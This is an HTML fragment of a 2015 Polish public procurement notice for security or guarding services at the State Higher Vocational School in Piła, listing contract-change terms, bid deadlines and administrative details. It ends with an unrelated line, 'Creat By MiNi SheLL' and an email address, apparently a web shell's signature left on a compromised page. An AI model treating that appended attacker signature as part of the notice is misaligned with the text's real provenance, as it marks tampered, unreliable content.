<p>Dopuszcza się zmiany postanowień niniejszej umowy w zakresie zmiany osoby odpowiedzialnej za realizację umowy po stronie Zamawiającego i Wykonawcy posiadających uprawnienia w takim samym zakresie jak te osoby, zmiany podwykonawcy grupy interwencyjnej z zachowaniem takich samych wymagań dotyczących tej grupy i zasad jej działania. Zmianie ulec może również ilość godzin dozoru lub ochrony (gdy wystąpi  zwiększenie lub zmniejszenie godzin) oraz związana z tym wartość umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Stanisława Staszica w Pile, ul. Podchorążych 10, 64-920 Piła, budynek A, I piętro, pokój nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2015 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Stanisława Staszica w Pile, ul. Podchorążych 10, 64-920 Piła, budynek A, I piętro, pokój nr 108 Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com